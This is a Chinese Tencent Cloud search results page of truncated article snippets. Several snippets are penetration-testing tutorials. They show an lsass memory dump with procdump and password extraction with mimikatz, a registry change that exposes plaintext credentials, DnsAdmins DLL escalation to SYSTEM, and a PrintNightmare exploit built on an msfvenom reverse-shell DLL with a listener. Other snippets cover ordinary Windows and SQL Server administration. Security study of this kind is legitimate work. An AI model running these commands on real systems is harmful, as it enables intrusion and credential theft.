首页
学习
活动
专区
圈层
工具
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    获取Windows明文密码的小技巧

    在实战中,拿到一台Windows服务器权限,如果可以直接获取Windows明文密码的话,就可以更容易深入挖掘。本文分享几个获取Windows明文密码的技巧,简单直接且有效。...sysinternals/downloads/procdump mimikatz: https://github.com/gentilkiwi/mimikatz/ (2)Windows Server 2008 R2...提取明文密码 在目标机器上生成存储文件: procdump64.exe -accepteula -ma lsass.exe lsass.dmp 将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本...02、Window 2012 R2抓取密码 在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。...Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 加载

    3.7K40

    Web架构&OSS存储&负载均衡&CDN加速&反向代理&WAF防护

    Network)是建立并覆盖在承载网之上,由遍布全球的边缘节点服务器群组成的分布式网络 原理:内容分发服务,旨在提高访问速度 影响:隐藏真实源IP,导致对目标测试错误 演示:阿里云备案域名全局...CDN加速服务 Windows2012 + BT宝塔面板 + CDN服务 阿里云购买CDN服务:域名需要备案 超级ping测试CDN OSS 原理:数据以对象(Object)的形式存储在...1)静态文件会占用大量带宽 2)加载速度 3)存储空间 影响: 上传的文件或解析的文件均来自于OSS资源,无法解析,单独存储 1、修复上传安全 2、文件解析不一样...3、 Accesskey隐患 OSS存储只是单纯的储存数据资源,没有代码执行环境,即使上传了后门脚本,也无法解析,相对于直接上传到网站服务器上,更加安全。...正向代理: 反向代理: 演示:Nginx反向代理配置 Windows2012 + BT宝塔面板 + Nginx 负载均衡 原理:分摊到多个操作单元上进行执行,共同完成工作任务 影响:有多个服务器加载服务

    8010

    域渗透 | 利用DnsAdmins提权到SYSTEM

    我们查阅文档发现:ServerLevelPluginDll服务器没有对此操作中指定的DLL路径进行任何验证。接下来的文章中,我们将详细分析该攻击的实现。...这个功能将在某些情况下可以在域控制器上以SYSTEM身份运行任意代码,无需成为管理员。这个操作已经得到微软的确认,这不是一个安全漏洞。但这仍是一个非常实用的技巧,可以用作红队的AD特权提升当中。...如果遇到没有,无法执行可以自行上传。 将谷歌搜索出来dnscmd.exe和dnscmd.exe.mui,下载到目标系统的时候,发现无法执行。需要从本机上拷贝执行。...确保dnscmd.exe可以执行 3、生成攻击dll和验证dll 当目标机器上边有杀毒,无法讲msfvenom生成的dll文件上传的目标机器。...服务器上实现远程加载Dll时,会以System权限修改注册表,如果修改注册表 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters

    1.5K30

    CVE-2021-1675 Windows Print Spooler RCE EXP

    客户端可以使用 RPC 调用 RpcAddPrinterDriver 向打印服务器添加驱动程序。 客户端确保打印机驱动程序的文件位于服务器可访问的位置。...为此,客户端可以共享包含文件的本地目录,或使用 [MS-SMB] 将文件放入服务器上的目录中 然后客户端分配并填充 DRIVER_INFO_2 结构,如下所示:pName = L"OEM 打印机驱动程序...然后它将它们复制到 C:\Windows\System32\spool\drivers\x64\3,并加载 C:\Windows\System32\spool\drivers\x64\3\A.dll 和...它将加载我们的邪恶 dll。不幸的是,它不起作用。因为如果你在文件夹C:\Windows\System32\spool\drivers\x64\3中设置了A、B、C。文件复制会出现访问冲突。...然后我们可以绕过访问冲突并成功将我们的 evil.dll 注入到 spooler 服务中。 成功加载我们的dll: 用法 .

    1.2K20

    windows系统中毒,sql server数据库文件恢复抢救和OA程序文件恢复.

    问题回顾: 1:服务器遭受勒索病毒攻击,导致服务器OA文件和数据库文件被锁,OA网站无法打开,数据库表无法读取。...资产介绍: 1:一台服务器中毒,系统是:windows server 2012 R2。...4核16G,500G硬盘 2:主要程序sql server 2008R2数据库,数据库量在100G以内 3:OA程序提供web访问 整个业务架构图: 架构图非常简单,如图: 排查思路: 1:第一时间切断公网...再开台windows服务器,通过内网连接中毒服务器。 2:查看服务器受损程度,特别是OA和数据库文件。 OA服务无法打开,数据库无法打开。...1:准备纯净系统,windows2012 R2,手动部署sql server 2008R2,厂商重新部署OA。 2:做好此初始环境的快照,避免后期问题,导致重装。

    1.6K30

    Windows Server 2012 活动目录的安装与升级

    通过近一段时间Windows Server 2012,Hyper-V3.0与IIs8.0的使用,感觉2012的改变确实是很大,并且集中的控制台,在单独一台服务器上可以管理整个公司内的Windows Server2012...在Windows 2012上安装活动目录域服务。 ? ? ? 选择本地服务器 ? 添加活动目录域服务 ? 添加“组策略”管理功能 ? 正在安装 ? 安装成功 ?...活动目录和域的扩展和架构准备,在以前的升级时我们需要手动来扩展,现在windows2012自动帮我们来执行AdPREP命令了 ?...点击安装,开始升级林架构与域架构,并在此服务器上安装活动目录域控制器角色,此步骤可需要很长一段时间 ? ? 正在从Dc1复制数据 ?...OK,安装完成,安装完成后会自动重启此服务器 安装完成后,在主Dc的站点和服务里面可以看到这台新装的Dc ? 为了安全起见,先把原来的额外Dc关掉一段时间,观察测试一段时间。

    2.1K10

    Windows 的 NTLM 中继

    在 liblsarelay.dll 中实现的虚假 LSA 身份验证提供程序、作为控制接口的用户模式控制台应用程序和名为 RAW 的新 ntlmrelayx 服务器模块。...liblsarelayx.dll liblsarelayx.dll 是由 lsarelayx 加载的 LSA 身份验证提供程序。...注意事项 一旦将 liblsarelayx DLL 加载到 lsass 中,由于 LSA 插件工作方式的限制,目前您无法卸载它。...由于 LSA 插件实际上并不是真正的插件,因此计划在插件内部实现一个反射加载器,然后可以随意停止和启动,但这是另一天的练习。 开发是在 Windows 10 和 Server 2016 上进行的。...在 Windows Server 2012 R2 上进行了快速测试,该测试有效,但挂钩偏移的计算可能会在 2012 上失败(这可以使用 手动提供lookuppackage-hint=,如果出错,Windows

    1.5K20

    windows 2008 R2 64位服务器中开启php curl扩展的方法

    这篇文章主要介绍了windows 2008 R2 64位服务器中开启php curl扩展的方法,需要的朋友可以参考下 今天小编接到一客户的提问:系统是windows2008R2版 php_curl这个扩展没有开启...,我当时在想怎么可能呢,小编配了好多次每个扩展就是开启的这个函数 进服务器看了下没有任何问题,extension=php_curl.dll这个明明是开启的,libeay32.dll、ssleay32.dll...、php_curl.dll 这几个文件在C:\WINDOWS\system32目录下也有,加载phpinfo时怎么就没有Curl项呢 重新注册在开始-运行-输入regsvr32 php_curl.dll...操作系统的子系统,能够运行32位应用程序,并且在所有64位版本的windows上都存在) 抱着侥幸心理将上面的三个DLL文件复制到了syswow64这个文件夹下,重启了下IIS 架设个测试站点 复制代码...> 网站出现了,网站可以打开了,重新看了下phpinfo查了下里面的curl扩展也有了 这里就与大家共享下,嘿嘿~ 总结: php_curl扩展在64位下不能正常应用,则需将libeay32.dll、

    1.9K00

    windows2012的NIC Teaming配置

    这种情况会带来两个问题:1.每个供应商提供的解决方案都是基于自家的各种硬件来实现,不对其他供应商的硬件提供支持;2.如果在一个配置了Teaming的网络上出现连接错误,需要找第三方的供应商来解决问题,微软无法提供相应的支持...在新的Windows Server 2012 R2版本中,微软给出了集成到操作系统的Teaming解决方案,  首先Windows Server 2012的NIC Teaming模式有三种: 静态成组(...这种方式无法控制流量的走向,如果有大量数据是流向一个目标地址,那么只会通过一块物理网卡来发送。       ...动态:这种方式是在Windows Server 2012 R2中新引入的方式,也是最优化的方式,数据会被平分到所有的成员网卡上,最大效率的利用带宽。  ...创建一个windows2012 NIC Teaming的方法很简单,下面举个例子: 1、首先需要启用NIC ?

    2.7K30

    解决module = loader.load_module(fullname) ImportError: DLL load failed: 找不到指定的模块。

    这个错误通常是由于无法找到依赖的动态链接库(DLL)文件引起的。本篇文章将介绍一些解决这个问题的方法。1. 检查环境变量首先,我们需要检查操作系统的环境变量,确保所需的DLL文件所在的路径已正确配置。...在“系统变量”下找到名为“PATH”的变量,并点击“编辑”按钮。在弹出的编辑环境变量窗口中,点击“新建”按钮。输入DLL文件所在的路径,并点击“确定”按钮。...假设我们在使用Python的机器学习库​​tensorflow​​​时遇到了​​ImportError: DLL load failed: 找不到指定的模块​​错误。...总结起来,动态链接库(DLL)是一种在Windows操作系统中使用的共享库文件,具有共享性、动态加载、代码重用和版本管理等特点。它可以作为共享代码模块、插件系统、性能优化和操作系统调用的解决方案。...在Python中,可以使用​​ctypes​​模块加载和调用动态链接库中的函数。

    1.8K60

    在 PowerShell 中使用 SQ

    2、手动安装插件   下载SQL Server 2008 R2 SP2 功能包 http://www.microsoft.com/zh-cn/download/details.aspx?...从安装了SQL Server 2008 R2的服务器上复制 C:\Program Files\Microsoft SQL Server\100\Tools\Binn 目录下的2个文件:Microsoft.SqlServer.Management.PSProvider.dll...   : 2.0 Description : SQL Server Provider PS C:\Windows\system32> 二、PowerShell 访问 SQL Server 2008 1、加载插件...实现的功能:每隔15分钟访问一次远程的192.168.159.130 服务器上的 SQL Server 默认实例。然后将访问的结果输出到一个文本文件monitor.txt 中。...在“新建任务”对话窗口点“确定”,这时候会要求输入运行该任务的帐号所对应的密码。  ? 4、验证计划任务   在“活动任务”列表中检查刚才创建的任务。  ?

    93410

    【腾讯云双十一好物开箱】分享Windows主机部署ASP与PHP环境的实践探索

    主要因为我在很久之前有一套asp的程序代码,想要改变下程序域名,其次是为了尝试解决一些linux无法遇到的问题,服务器主机还能作为全能主机,可以使用宝塔面板来运行asp和php程序。...云服务器购买在双十一活动期间,腾讯云推出了多款产品优惠方案,结合你当前的需求,选择了云服务器(CVM)或者轻量云服务器。...腾讯云的云服务器非常适合构建全能主机环境,特别是在需要灵活扩展和稳定性方面,云服务器具有明显优势。...该镜像基于Windows Server 2012 R2 中文版操作系统。注意:我想自己动手,所以我选择windows2012中文版,不建议选择更高版本,毕竟我选择的服务器配置并不高。...,可选择【自定义选项】就也是安装的目录,如果没有数据库直接【一键安装】即可,如图:等待安装,都加载完成后自动弹出界面,如图:打开浏览器复制粘贴地址,然后输入后台账号密码。

    4.4K10

    Windows获取密码及hash

    前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。...下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: mimikatz.exe log "privilege...在windows高版本操作系统中(例如:windows2012、windows2016等等),不能直接获取明文密码,可以利用获取到的hash值在cmd5等一些在线网站中尝试解密获取明文密码。...高版本操作系统中(例如:windows2012、windows2016等等),默认情况下已禁止在内存缓存中存系统用户明文密码,不能直接使用Mimikatz从内存中获取到明文密码。...REG_DWORD /d 1 使用如下powershell脚本,可以强制电脑锁屏: Function Lock-WorkStation { $signature = @" [DllImport ("user32.dll

    2.7K30

    CVE-2021-167534527:Windows Print Spooler权限提升复现

    0x02 漏洞概述 攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务...,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。...LPORT=4444 -f dll -o /usr/share2/shell.dll 3、msf或者nc开启监听 msf 和 nc开启监听都可以 nc -lnvp 4444 4、执行exp exp...临时防护措施: 若相关用户暂时无法进行补丁更新,可通过禁用Print Spooler服务来进行缓解: 1)在服务应用(services.msc)中找到Print Spooler服务。...2、windows共享利用失败 在windows上测试开启共享之后,能够在域控上匿名访问到共享文件,但是exp一直失败。

    3.5K30
    领券